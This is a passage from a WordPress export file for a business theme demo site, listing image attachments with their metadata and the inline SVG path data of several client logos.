		<wp:post_date><![CDATA[2020-12-29 07:30:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:30:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-grid]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-grid.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/bg1-service-grid.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:600;s:4:"file";s:28:"2020/12/bg1-service-grid.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:27:"bg1-service-grid-300x94.jpg";s:5:"width";i:300;s:6:"height";i:94;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"bg1-service-grid-1024x320.jpg";s:5:"width";i:1024;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"bg1-service-grid-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"bg1-service-grid-768x240.jpg";s:5:"width";i:768;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"bg1-service-grid-1536x480.jpg";s:5:"width";i:1536;s:6:"height";i:480;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"bg1-service-grid-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"bg1-service-grid-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"bg1-service-grid-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:29:"bg1-service-grid-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/attachment/01/</link>
		<pubDate>Tue, 29 Dec 2020 07:43:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2002</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:43:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:43:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/01.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 132.8 31.6" style="enable-background:new 0 0 132.8 31.6;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x31_">
	<g>
		<path class="st0" d="M36.1,14.4l0,10.1c0,0.5-0.3,0.9-0.7,1.2l-8.7,5c-0.4,0.2-0.9,0.2-1.4,0L19.1,27c0.9-0.3,1.6-1.2,1.6-2.2    v-2.3c0.1,0.1,4.8,2.9,4.8,2.9c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9l0-5.1c0-0.4-0.2-0.7-0.5-0.9l-4.4-2.8    c-0.3-0.2-0.7-0.2-1.1,0l-6.7,3.6c-0.3,0.2-0.7,0.2-1.1,0l-1.8-1h0l0-1.3c0-0.5,0.3-0.9,0.7-1.2l1.6-0.9l5.4-3.1l0.1-0.1l1.6-0.9    c0.4-0.2,0.9-0.2,1.4,0L28.2,9l0.1,0.1l7.1,4.1C35.8,13.4,36.1,13.9,36.1,14.4z"></path>
		<path class="st0" d="M28.3,8.2l-1.5-0.9c-0.4-0.2-0.9-0.2-1.4,0l-1.6,0.9l-0.1,0.1c-1-0.6-4.9-2.9-4.9-2.9c-0.3-0.2-0.7-0.2-1.1,0    l-4.4,2.5c-0.3,0.2-0.5,0.5-0.5,0.9v0.6l0,4.5c0,0.4,0.2,0.7,0.5,0.9l2.7,1.5l1.8,1c0.3,0.2,0.7,0.2,1.1,0l1.7-1l0,4.9    c-0.1,0-1.6,0.9-1.6,0.9c-0.4,0.2-0.9,0.5-1.4,0.3l-1.6-0.8l0,0l-7.1-4.1c-0.4-0.2-0.7-0.7-0.7-1.2l0-1.7l0-5.3l0-3.1    c0-0.5,0.3-0.9,0.7-1.2l8.7-5c0.4-0.2,0.9-0.2,1.4,0l8.7,5c0.4,0.2,0.7,0.7,0.7,1.2C28.3,7.1,28.3,7.5,28.3,8.2z"></path>
		<path class="st0" d="M20.1,22.2l0,2.8v0.3c0,0.5-0.3,0.9-0.7,1.2L18.4,27l-0.5,0.3l-7.1,4.1c-0.4,0.2-0.9,0.2-1.4,0l-8.7-5    C0.3,26.1,0,25.7,0,25.2v-0.3l0-9.8c0-0.5,0.3-0.9,0.7-1.2L7.6,10v5.2c0,0,0,0.1,0,0.1l-2.4,1.4c-0.3,0.2-0.5,0.5-0.5,0.9l0,4.8    v0.3c0,0.4,0.2,0.7,0.5,0.9l4.4,2.6c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9v-0.6l0,0l0.2,0.1l1.4,0.8    c0.4,0.2,0.9,0.2,1.4,0l0,0l0,0c0.1,0,0.1,0,0.2-0.1L20.1,22.2z"></path>
	</g>
	<g>
		<path class="st0" d="M49.8,23.5c-0.9-0.3-1.6-0.6-2.1-1l0.9-2.1c0.5,0.4,1.1,0.7,1.8,0.9c0.7,0.2,1.4,0.3,2.1,0.3    c0.8,0,1.4-0.1,1.7-0.4c0.4-0.2,0.6-0.5,0.6-0.9c0-0.3-0.1-0.5-0.3-0.7c-0.2-0.2-0.5-0.3-0.9-0.5c-0.3-0.1-0.8-0.2-1.4-0.4    c-0.9-0.2-1.7-0.4-2.2-0.6c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.5-0.6-1.1-0.6-1.9c0-0.7,0.2-1.3,0.6-1.9c0.4-0.6,0.9-1,1.7-1.3    c0.8-0.3,1.7-0.5,2.8-0.5c0.8,0,1.5,0.1,2.2,0.3c0.7,0.2,1.4,0.4,1.9,0.8l-0.9,2.1c-1.1-0.6-2.2-0.9-3.3-0.9    c-0.8,0-1.3,0.1-1.7,0.4c-0.4,0.3-0.6,0.6-0.6,1s0.2,0.7,0.6,0.9c0.4,0.2,1.1,0.4,2,0.6c0.9,0.2,1.7,0.4,2.2,0.6    c0.6,0.2,1.1,0.6,1.5,1c0.4,0.5,0.6,1.1,0.6,1.9c0,0.7-0.2,1.3-0.6,1.9c-0.4,0.6-1,1-1.7,1.3c-0.8,0.3-1.7,0.5-2.8,0.5    C51.6,23.8,50.7,23.7,49.8,23.5z"></path>
		<path class="st0" d="M68.8,21.4v2.2h-9.3v-12h9v2.2h-6.3v2.6h5.6v2.2h-5.6v2.8H68.8z"></path>
		<path class="st0" d="M73.4,23c-1-0.5-1.8-1.3-2.3-2.2c-0.6-0.9-0.8-2-0.8-3.2c0-1.2,0.3-2.2,0.8-3.2c0.6-0.9,1.3-1.7,2.3-2.2    c1-0.5,2.1-0.8,3.4-0.8c1.2,0,2.4,0.3,3.3,0.8c1,0.5,1.8,1.3,2.3,2.2c0.6,0.9,0.9,2,0.9,3.2c0,1.2-0.3,2.2-0.9,3.2    c-0.6,0.9-1.4,1.7-2.3,2.2c-1,0.5-2.1,0.8-3.3,0.8C75.5,23.8,74.4,23.6,73.4,23z M78.7,21c0.6-0.3,1-0.8,1.3-1.4    c0.3-0.6,0.5-1.2,0.5-2c0-0.7-0.2-1.4-0.5-2c-0.3-0.6-0.8-1-1.3-1.4c-0.6-0.3-1.2-0.5-1.9-0.5c-0.7,0-1.3,0.2-1.9,0.5    c-0.6,0.3-1,0.8-1.3,1.4c-0.3,0.6-0.5,1.2-0.5,2c0,0.7,0.2,1.4,0.5,2c0.3,0.6,0.8,1,1.3,1.4c0.6,0.3,1.2,0.5,1.9,0.5    C77.5,21.5,78.1,21.3,78.7,21z"></path>
		<path class="st0" d="M101.1,23.6l0-7.2l-3.5,5.9h-1.2l-3.5-5.8v7h-2.6v-12h2.3l4.5,7.4l4.4-7.4h2.3l0,12H101.1z"></path>
		<path class="st0" d="M106.5,12.7c-0.3-0.3-0.5-0.6-0.5-1.1c0-0.4,0.2-0.8,0.5-1.1c0.3-0.3,0.7-0.4,1.2-0.4c0.5,0,0.9,0.1,1.2,0.4    s0.5,0.6,0.5,1c0,0.4-0.2,0.8-0.5,1.1c-0.3,0.3-0.7,0.4-1.2,0.4C107.2,13.2,106.8,13,106.5,12.7z M106.3,14.4h2.7v9.2h-2.7V14.4z"></path>
		<path class="st0" d="M119.8,15.3c0.7,0.7,1.1,1.7,1.1,3v5.3h-2.7v-4.9c0-0.7-0.2-1.3-0.5-1.6c-0.3-0.4-0.8-0.5-1.4-0.5    c-0.7,0-1.2,0.2-1.6,0.6c-0.4,0.4-0.6,1-0.6,1.9v4.5h-2.7v-9.2h2.5v1.1c0.4-0.4,0.8-0.7,1.3-0.9c0.5-0.2,1.1-0.3,1.7-0.3    C118.2,14.3,119.1,14.7,119.8,15.3z"></path>
		<path class="st0" d="M132.8,11v12.7h-2.5v-1.1c-0.7,0.8-1.6,1.2-2.9,1.2c-0.9,0-1.6-0.2-2.4-0.6c-0.7-0.4-1.3-0.9-1.6-1.7    c-0.4-0.7-0.6-1.5-0.6-2.5c0-0.9,0.2-1.8,0.6-2.5c0.4-0.7,0.9-1.3,1.6-1.7c0.7-0.4,1.5-0.6,2.4-0.6c1.2,0,2.1,0.4,2.8,1.1V11    H132.8z M129.5,20.9c0.4-0.5,0.7-1.1,0.7-1.9c0-0.8-0.2-1.4-0.7-1.9c-0.4-0.5-1-0.7-1.7-0.7c-0.7,0-1.2,0.2-1.7,0.7    c-0.4,0.5-0.7,1.1-0.7,1.9c0,0.8,0.2,1.4,0.7,1.9c0.4,0.5,1,0.7,1.7,0.7C128.5,21.6,129,21.4,129.5,20.9z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/attachment/02/</link>
		<pubDate>Tue, 29 Dec 2020 07:43:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2003</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:43:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:43:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/02.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 131.6 29.8" style="enable-background:new 0 0 131.6 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x32_">
	<g>
		<path class="st0" d="M43.3,8.1h2.8v12.5h-2.8V8.1z"></path>
		<path class="st0" d="M53.1,20.7c-0.7,0-1.4,0-2-0.1s-1.4-0.1-2.1-0.3V8.3c0.6-0.1,1.2-0.2,1.9-0.2c0.7-0.1,1.3-0.1,1.9-0.1    c0.8,0,1.5,0.1,2.2,0.2c0.7,0.1,1.2,0.3,1.7,0.6c0.5,0.3,0.9,0.6,1.1,1.1c0.3,0.5,0.4,1,0.4,1.7c0,1-0.5,1.8-1.4,2.4    c0.8,0.3,1.3,0.7,1.6,1.2c0.3,0.5,0.4,1.1,0.4,1.7c0,1.3-0.5,2.3-1.4,3C56.4,20.4,55,20.7,53.1,20.7z M51.7,13h1.4    c0.9,0,1.5-0.1,1.9-0.3c0.4-0.2,0.6-0.6,0.6-1.1c0-0.5-0.2-0.9-0.6-1.1s-0.9-0.3-1.7-0.3c-0.2,0-0.5,0-0.8,0c-0.3,0-0.5,0-0.7,0    V13z M51.7,15.1v3.2c0.2,0,0.4,0,0.7,0.1c0.2,0,0.5,0,0.8,0c0.8,0,1.5-0.1,2-0.4s0.8-0.7,0.8-1.3c0-0.6-0.2-1-0.6-1.2    c-0.4-0.2-1-0.4-1.9-0.4H51.7z"></path>
		<path class="st0" d="M64.4,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2H72c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H64.4z"></path>
		<path class="st0" d="M84.8,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2h-2.7c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H84.8z"></path>
		<path class="st0" d="M97,15.9c0-0.8,0.1-1.6,0.4-2.2c0.3-0.6,0.6-1.2,1-1.6c0.4-0.4,0.9-0.7,1.4-1c0.5-0.2,1.1-0.3,1.7-0.3    c1.3,0,2.4,0.4,3.2,1.2c0.8,0.8,1.2,2,1.2,3.6c0,0.2,0,0.3,0,0.5c0,0.2,0,0.4,0,0.5h-6.1c0.1,0.6,0.3,1,0.8,1.3s1.1,0.5,1.8,0.5    c0.5,0,1,0,1.4-0.1c0.5-0.1,0.9-0.2,1.2-0.3l0.4,2.2c-0.1,0.1-0.3,0.1-0.6,0.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-0.9,0.1    s-0.7,0.1-1,0.1c-0.9,0-1.6-0.1-2.2-0.4s-1.2-0.6-1.6-1c-0.4-0.4-0.7-1-0.9-1.6C97.1,17.2,97,16.6,97,15.9z M103.3,14.9    c0-0.2-0.1-0.4-0.1-0.7c-0.1-0.2-0.2-0.4-0.3-0.6c-0.1-0.2-0.3-0.3-0.5-0.4c-0.2-0.1-0.5-0.2-0.8-0.2c-0.3,0-0.6,0.1-0.8,0.2    c-0.2,0.1-0.4,0.2-0.5,0.4c-0.1,0.2-0.3,0.4-0.3,0.6c-0.1,0.2-0.1,0.4-0.2,0.7H103.3z"></path>
		<path class="st0" d="M116.4,20.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-1,0.2c-0.3,0-0.7,0.1-1,0.1c-0.4,0-0.7,0-1,0    c-0.8,0-1.5-0.1-2.1-0.3c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.4-0.7-0.9-1-1.5c-0.2-0.6-0.3-1.3-0.3-2c0-0.8,0.1-1.5,0.3-2.1    c0.2-0.6,0.5-1.1,0.8-1.6c0.4-0.4,0.8-0.8,1.3-1c0.5-0.2,1.1-0.3,1.8-0.3c0.4,0,0.7,0,1,0.1c0.3,0.1,0.6,0.2,0.9,0.3V7l2.7-0.4    V20.2z M110.3,15.7c0,0.8,0.2,1.5,0.6,2s0.9,0.8,1.7,0.8c0.2,0,0.5,0,0.7,0c0.2,0,0.4,0,0.5-0.1v-4.9c-0.2-0.1-0.4-0.2-0.7-0.3    c-0.3-0.1-0.5-0.1-0.8-0.1C110.9,13.2,110.3,14,110.3,15.7z"></path>
		<path class="st0" d="M121.8,8.3c0,0.5-0.2,0.9-0.5,1.2s-0.7,0.4-1.1,0.4c-0.4,0-0.8-0.1-1.1-0.4s-0.5-0.7-0.5-1.2s0.2-0.9,0.5-1.2    c0.3-0.3,0.7-0.4,1.1-0.4c0.4,0,0.8,0.1,1.1,0.4C121.6,7.5,121.8,7.9,121.8,8.3z M121.6,20.6h-2.7v-9.5h2.7V20.6z"></path>
		<path class="st0" d="M127.5,10.8c0.8,0,1.5,0.1,2,0.3c0.5,0.2,1,0.4,1.3,0.8c0.3,0.3,0.5,0.7,0.7,1.2c0.1,0.5,0.2,1,0.2,1.6v5.6    c-0.4,0.1-0.9,0.2-1.6,0.3c-0.7,0.1-1.5,0.2-2.5,0.2c-0.6,0-1.2-0.1-1.7-0.2c-0.5-0.1-0.9-0.3-1.3-0.5s-0.6-0.6-0.8-1    c-0.2-0.4-0.3-0.9-0.3-1.5c0-0.6,0.1-1,0.3-1.4c0.2-0.4,0.5-0.7,0.9-0.9c0.4-0.2,0.8-0.4,1.3-0.5c0.5-0.1,1-0.2,1.5-0.2    c0.3,0,0.7,0,0.9,0c0.3,0,0.5,0.1,0.7,0.1v-0.3c0-0.5-0.1-0.8-0.4-1.1c-0.3-0.3-0.8-0.4-1.4-0.4c-0.5,0-0.9,0-1.4,0.1    c-0.4,0.1-0.8,0.2-1.2,0.3l-0.3-2.2c0.2,0,0.4-0.1,0.6-0.2c0.2-0.1,0.5-0.1,0.8-0.1c0.3,0,0.6-0.1,0.9-0.1    C126.9,10.8,127.2,10.8,127.5,10.8z M127.7,18.7c0.3,0,0.5,0,0.8,0s0.4,0,0.6-0.1v-2c-0.1,0-0.3,0-0.5-0.1c-0.2,0-0.4,0-0.6,0    c-0.3,0-0.5,0-0.7,0s-0.4,0.1-0.6,0.2s-0.3,0.2-0.4,0.3c-0.1,0.1-0.1,0.3-0.1,0.5c0,0.4,0.1,0.7,0.4,0.9S127.2,18.7,127.7,18.7z"></path>
	</g>
	<g>
		<g>
			<path class="st0" d="M5.5,6.5V0H4.8C2.2,0,0,2.2,0,4.8v1.7H5.5z"></path>
		</g>
		<g>
			<path class="st0" d="M25.1,8.4h4.8V4.8c0-2.6-2.1-4.8-4.8-4.8V8.4z"></path>
		</g>
		<g>
			<path class="st0" d="M21.6,25.1v4.7H25c2.6,0,4.8-2.1,4.8-4.7H21.6z"></path>
		</g>
		<g>
			<path class="st0" d="M6.7,23.8H0v-1.5h7.4c0.4,0,0.8,0.3,0.8,0.8v6.8h2.2v-9.4H6c-0.4,0-0.8-0.3-0.8-0.8V14     c-0.5-0.3-0.9-0.9-0.9-1.5c0-0.9,0.8-1.7,1.7-1.7c0.9,0,1.7,0.8,1.7,1.7c0,0.7-0.4,1.3-1,1.6V19h4.4c0.4,0,0.8,0.3,0.8,0.8v10.1     h3.4v-3.4c-0.6-0.3-1-0.9-1-1.6c0-0.9,0.8-1.7,1.7-1.7s1.7,0.8,1.7,1.7c0,0.7-0.4,1.2-0.9,1.5v3.4H20v-5.5c0-0.4,0.3-0.8,0.8-0.8     h9v-9.5h-3v4.7c0,0.4-0.3,0.8-0.8,0.8h-5.5c-0.3,0.6-0.9,1-1.6,1c-0.9,0-1.7-0.8-1.7-1.7c0-0.9,0.8-1.7,1.7-1.7     c0.7,0,1.2,0.4,1.5,0.9h4.8v-4.7c0-0.4,0.3-0.8,0.8-0.8h3.7V9.9h-5.5c-0.4,0-0.8-0.3-0.8-0.8V0h-8.2v2.7h5.1     c0.4,0,0.8,0.3,0.8,0.8v5.6c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7c-0.9,0-1.7-0.8-1.7-1.7c0-0.7,0.4-1.2,0.9-1.5V4.2h-5.1     c-0.4,0-0.8-0.3-0.8-0.8V0h-3.7v5.6h3.1c0.4,0,0.8,0.3,0.8,0.8v7c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7     c-0.9,0-1.7-0.8-1.7-1.7c0-0.6,0.4-1.2,0.9-1.5V7.1H9.4C9,7.1,8.6,6.7,8.6,6.3V0H7v7.2C7,7.7,6.7,8,6.3,8H0v17     c0,2.7,2.2,4.8,4.8,4.8h1.9V23.8z"></path>
		</g>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/attachment/03/</link>
		<pubDate>Tue, 29 Dec 2020 07:43:56 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2004</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:43:56]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:43:56]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/03.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 141.3 30" style="enable-background:new 0 0 141.3 30;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x33_">
	<g>
		<path class="st0" d="M63.8,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5c-0.4,0.4-0.9,0.8-1.5,1c-0.6,0.2-1.2,0.4-1.9,0.4    c-0.7,0-1.4-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1.1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,1.9-0.4c0.8,0,1.5,0.2,2.2,0.5c0.7,0.3,1.3,0.8,1.7,1.3l-1.6,1.4    c-0.3-0.4-0.7-0.7-1-0.9s-0.8-0.3-1.3-0.3c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6s-0.4,0.5-0.5,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.8,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9s0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1.1,0.2    c0.5,0,1-0.1,1.4-0.4c0.4-0.3,0.7-0.6,0.8-1.1h-2.5v-2h5V17.8z"></path>
		<path class="st0" d="M65,22.5v-9.3h4.8c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.7,0.4,1,0.6c0.3,0.3,0.5,0.6,0.7,0.9    c0.2,0.4,0.2,0.8,0.2,1.2c0,0.6-0.2,1.1-0.5,1.6c-0.3,0.5-0.7,0.8-1.3,1.1l2,3.7h-2.6L69,19.1h-1.7v3.4H65z M69.6,15.1h-2.3v2.1    h2.3c0.4,0,0.6-0.1,0.9-0.3c0.2-0.2,0.3-0.4,0.3-0.8c0-0.3-0.1-0.6-0.3-0.8C70.2,15.2,69.9,15.1,69.6,15.1z"></path>
		<path class="st0" d="M74.2,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H74.2z"></path>
		<path class="st0" d="M83,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H83z"></path>
		<path class="st0" d="M91.7,13.2h2.2l4.2,5.4v-5.4h2.2v9.3h-2l-4.4-5.6v5.6h-2.2V13.2z"></path>
